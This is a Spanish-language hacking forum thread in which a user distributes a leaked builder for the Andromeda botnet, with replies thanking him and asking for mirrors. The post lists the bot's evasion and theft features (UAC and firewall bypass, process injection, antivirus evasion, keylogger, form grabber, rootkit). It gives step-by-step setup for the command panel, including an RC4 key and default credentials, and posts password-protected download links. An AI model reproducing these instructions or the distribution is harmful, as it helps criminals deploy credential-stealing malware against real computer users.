• Troyanos y Herramientas

  • Comparte herramientas de administración remota y otras variantes de malware. Y acompaña una breve descripción de los mismos.
Comparte herramientas de administración remota y otras variantes de malware. Y acompaña una breve descripción de los mismos.
 #395939  por SuC
 19 Nov 2012, 22:42
Bueno, aquí os dejo este builder para la botnet Andromeda. En mi opinión, este builder no debería haber sido público, pero The Old Warrior al final decidió publicarlo.

Para los que no conocían esta bot, ahora explicaré más o menos su contenido.

También cabe decir que de las públicas, es de las más estables, y cuando digo pública me refiero que se vende en foros ..


Citaré parte del comentario del autor (Traducido del ruso):

La comunicación entre el bot y el panel es encriptada usando RC4.
En su instalación no se necesita privilegios de administrador, ni salta UAC.
El proceso esta protegido para evitar que se pueda eliminar el bot del sistema.
Bypassea los firewalls y se inyecta en un proceso de confianza.
Si se instala correctamente, el exe se elimina automaticamente.
Funciona en sistemas desde XP a 7 incluyendo x64.
El peso del archivo es aproximadamente unos 10kb.
Bypassea muchas proactivas de los antivirus.


Imagen

Imagen

Imagen

Imagen

Imagen


Este bot viene con varios plugins; socks4, form grabber, keylogger, ring3 rootkit.


Aquí una imagen del builder que creó The Old Warrior.

Imagen


Como se configura (En inglés pero es lo mismo que todas las bots..):

. Upload /Panel files to androhost.com/andro
2. Create one mysql db.
3. Upload f.pack, r.pack and s.pack from /Plugins folder in: androhost.com/andro directory.
4. chmod 777 androhost.com/andro/config.php, chmod 777 androhost.com/andro/fp_logs directory
5. Open in your browser androhost.com/andro/index.php?act=install.
6. Login with default creditials: admin:admin
7. Paste rc4 key to andromeda installation page: d40e75961383124949436f37f45a8cb6
8. Fill up all instalation page with your admin user and pasw, plus mysql details >> click 'Install'
9. After installation is done open in your browser androhost.com/andro/ifg.php
10. Delete androhost.com/andro/ifg.php and androhost.com/andro/GeoIPCountryWhois.csv.gz
11. Open Builder.exe > change host to: http://androhost.com/andro/image.php and build your bin.
12. For enable plugins just go in panel > menu > tasks > add task
Task type = Install plugin
Url= http://androhost.com/andro/r.pack
Click 'Enabled' and add your task, do the same for each plugin.


Descarga:
http://www.mediafire.com/?q3zxp7rlemba5gc
http://www.sendspace.com/file/2r63df

Descarga actualizada,el builder fue actualizado, también viene con un tool para poder ejecutar el bot en vm.

Contraseña:
TrojanForge.com
 #395942  por jorge705
 19 Nov 2012, 22:50
wow muchas gracias por la botnet :D
 #395950  por kender
 19 Nov 2012, 23:45
gracias por la botnet pero la podrian subir a sendspace por q mediafire blokeo el link claroro si no es mucha molesti de todas formas muchisimas gracias
 #395952  por ukranow
 19 Nov 2012, 23:52
proactive escribió:Os vais a buscar problemas legales con el foro, publicando esta cosas para que niños la usen, ustedes vereis...ademas el autor waahoo a dicho que metera fuertes ataques ddos a tos foros donde sea publicado
entonces según tu waahoo también se metería en problemas legales
por hacer ataques ddos
 #395953  por peter1998
 20 Nov 2012, 00:00
Muy fresco que hice este trabajo, lamentablemente no puedo descargar sólo quiero otro enlace.
saludos.
 #395956  por SuC
 20 Nov 2012, 00:06
proactive escribió:Os vais a buscar problemas legales con el foro, publicando esta cosas para que niños la usen, ustedes vereis...ademas el autor waahoo a dicho que metera fuertes ataques ddos a tos foros donde sea publicado
Waahoo tendrá que ddosear todo Internet..
 #395957  por K7
 20 Nov 2012, 00:07
Cayo el link, por favor subirlo Gracias
 #395960  por otroyomismo
 20 Nov 2012, 00:37
proactive escribió:Os vais a buscar problemas legales con el foro, publicando esta cosas para que niños la usen, ustedes vereis...ademas el autor waahoo a dicho que metera fuertes ataques ddos a tos foros donde sea publicado
Se han publicado bots de verdad y nunca habia visto este tipo de comentarios,no se quejaron los creadores de zeus,spyeye y se quejan por esta que ni se les acerca..jajaa
 #395962  por SuC
 20 Nov 2012, 00:49
Ya lo re-subí
 #395975  por kender
 20 Nov 2012, 08:38
Muchisimas gracias men


 #395981  por SuC
 20 Nov 2012, 12:30
Descarga actualizada,el builder fue actualizado, también viene con un tool para poder ejecutar el bot en vm.
 #395985  por Himanen
 20 Nov 2012, 14:07
No tiene mala pinta, la probare.. Gracias SuC
 #395986  por marantz2004
 20 Nov 2012, 14:09
Y para que sirve esto????
 #395987  por SuC
 20 Nov 2012, 14:13
marantz2004 escribió:Y para que sirve esto????
Busca en google información sobre botnets
 #396064  por atheros14
 21 Nov 2012, 06:38
gracias suc, le echaremos un vistazo